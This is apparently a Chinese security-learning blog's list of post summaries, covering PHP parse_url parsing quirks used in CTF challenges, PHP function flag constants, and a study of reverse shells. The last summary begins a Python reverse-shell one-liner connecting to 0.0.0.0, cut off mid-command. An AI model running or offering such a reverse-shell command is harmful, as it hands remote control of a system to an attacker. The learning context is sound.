摘要:
前言 看师傅们的文章时发现,parse_url出现的次数较多,单纯parse_url解析漏洞的考题也有很多,在此研究一下源码(太菜了看不懂,待日后再补充Orz) 源码 在 ext/standard/url.c 文件中 代码中遇到的问题解决 函数定义部分 引用这篇文章的内容http://www.now 阅读全文
摘要:
PHP的函数有很多都会有一个int参数,这些参数基本都是定义为一个常量,虽然不知道有啥用,先记录一下 他们对应的数字 1. htmlspecialchars(),htmlentities() http://php.net/manual/zh/function.htmlspecialchars.php 阅读全文
摘要:
前言 看师傅们的文章时发现,parse_url出现的次数较多,单纯parse_url解析漏洞的考题也有很多,在此研究一下源码(太菜了看不懂,待日后再补充Orz) 源码 分析 1. 只要请求的url里不含有冒号(:)就会被当成path解析 阅读全文
摘要:
前言 昨天学习了反弹shell,对python弹shell产生了一些疑惑 python c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("0.0.0.0",123 阅读全文